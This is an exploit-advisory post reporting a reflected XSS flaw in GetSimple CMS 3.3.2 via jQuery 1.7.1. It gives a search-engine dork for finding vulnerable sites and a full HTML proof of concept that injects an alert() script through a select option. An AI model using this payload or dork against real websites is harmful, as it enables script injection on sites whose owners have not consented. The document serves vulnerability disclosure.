====================================================================================================================================
| # Title     : GetSimple CMS v3.3.2 XSS Vulnerability                                                                             |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            |
| # Vendor    : http://get-simple.info/                                                                                            |
| # Dork      :  © 2009-2014 GetSimple CMS – Version 3.3.2                                                                         |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] LIne 5 Se7 y0ur T@rg3t .

[+] XSS Reflected - Jquery v1.7.1 :

<html>
<head>
  <meta charset="utf-8">
  <title>XSS Reflected - Jquery v1.7.1 </title>
  <script src="http://127.0.0.1/GetSimpleCMS/admin/template/js/jquery.min.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>
 
 
<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected"><script>alert(&#x27;xss
reflected - jquery v1.7.1 by - indoushka thnx to 
@firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>
      </select>
    </p>
  </form>
</body>
</html>

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================